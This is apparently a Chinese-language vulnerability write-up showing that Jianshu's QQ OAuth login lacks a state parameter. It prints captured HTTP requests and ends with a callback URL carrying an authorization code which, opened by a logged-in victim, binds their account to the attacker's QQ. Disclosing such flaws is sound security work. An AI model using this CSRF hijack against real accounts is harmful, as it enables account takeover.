简书oauth csrf绑定劫持

0x00 前言

简书在OAuth2.0验证的过程中,没有state参数来抵抗CSRF攻击,导致能利用CSRF将用户的账户绑定到攻击者的账号绑定到一起。

0x01 过程

点击使用qq登陆

GET /users/auth/qq_connect HTTP/1.1
Host: www.jianshu.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.jianshu.com/sign_in
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: xxxxxxxxxxxxxxxxxxxxxx

然后会自动跳到qq授权界面,qq授权界面会让你登陆。
client_id 应用id 简书
redirect_uri 成功授权后的回调地址
response_type 授权模式,这里的值是code(Authorization Code授权模式)
state 用于防御csrf
scope 权限控制

GET /oauth2.0/authorize?client_id=100410602&redirect_uri=http%3A%2F%2Fwww.jianshu.com%2Fusers%2Fauth%2Fqq_connect%2Fcallback&response_type=code HTTP/1.1
Host: graph.qq.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.jianshu.com/sign_in
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: xxxxxxxxxxxxxxxxxxxxxxxxx

省略n多步,都是qq登陆的过程。到下面这步,(g_tk相当于qq的apitoken可以通过apitoken获取数据),所以这步相当于授权登陆简书。在QQ互联管理中心,你就会发现你的QQ已经授权给简书了。

POST /oauth2.0/authorize HTTP/1.1
Host: graph.qq.com
Connection: close
Content-Length: 272
Cache-Control: max-age=0
Origin: https://graph.qq.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://graph.qq.com/oauth2.0/show?which=Login&display=pc&client_id=100410602&redirect_uri=http%3A%2F%2Fwww.jianshu.com%2Fusers%2Fauth%2Fqq_connect%2Fcallback&response_type=code
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: xxxxxxxxxxxxxxxxxxxxxx

response_type=code&client_id=100410602&redirect_uri=http%3A%2F%2Fwww.jianshu.com%2Fusers%2Fauth%2Fqq_connect%2Fcallback&scope=&state=&switch=&from_ptlogin=1&src=1&update_auth=1&openapi=80901010&g_tk=581224646&auth_time=1525967202765&ui=1FF7E879-E46A-4585-A5B1-40C28D1278B3

最后获取到授权码code。

GET /users/auth/qq_connect/callback?code=C1F69740B7B8281EA22B88FD8A4F044F HTTP/1.1
Host: www.jianshu.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: xxxxxxxxxxxxxxxxxxxxxxxx

接下来的步骤,是我们是捕捉不到的(通过授权码获取access token,然后用access token访问qq资源)。

获取到了qq授权码code,如果受害者登陆了简书,并且访问下面的链接,就会把受害者的简书账户绑定到该QQ上。

https://www.jianshu.com/users/auth/qq_connect/callback?code=C1F69740B7B8281EA22B88FD8A4F044F

这里直接拿qq登陆简书也是这样一个步骤。

截图